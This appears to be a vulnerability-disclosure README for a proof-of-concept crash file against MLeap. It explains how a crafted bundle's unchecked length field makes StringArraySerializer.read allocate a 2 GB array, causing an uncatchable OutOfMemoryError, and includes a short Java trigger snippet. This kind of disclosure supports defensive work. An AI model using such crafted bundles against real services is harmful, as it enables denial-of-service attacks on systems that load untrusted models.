File size: 1,171 Bytes
2007fbc
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
# MLeap StringArraySerializer OOM PoC

Proof-of-concept for an uncontrolled resource consumption vulnerability in MLeap's `StringArraySerializer.read`.

## Files
- `evil.mleap`: crafted MLeap bundle ZIP. Loading it triggers `OutOfMemoryError` via `new Array[Byte](0x7FFFFFFF)` in `StringArraySerializer.read`.

## Reproduce
```python
import struct, zipfile, io, base64
from mleap.pyspark.spark_support import SimpleSparkSerializer
# Or load via BundleFile in Scala/Java:
# BundleFile.load("evil.mleap")
```

## Root Cause
`StringArraySerializer.read` calls `din.readInt()` on attacker-controlled bytes and passes the result directly to `new Array[Byte](size)` with no bounds check. `OutOfMemoryError` extends `VirtualMachineError`; Scala's `NonFatal` extractor returns false for it, so the surrounding `Try{}` does not catch it — the error propagates and crashes the process.

## Trigger (Java)
```java
DataInputStream din = new DataInputStream(
    new ByteArrayInputStream(new byte[]{0x7F,(byte)0xFF,(byte)0xFF,(byte)0xFF}));
int size = din.readInt();       // 2147483647
byte[] bytes = new byte[size];  // OutOfMemoryError: Requested array size exceeds VM limit
```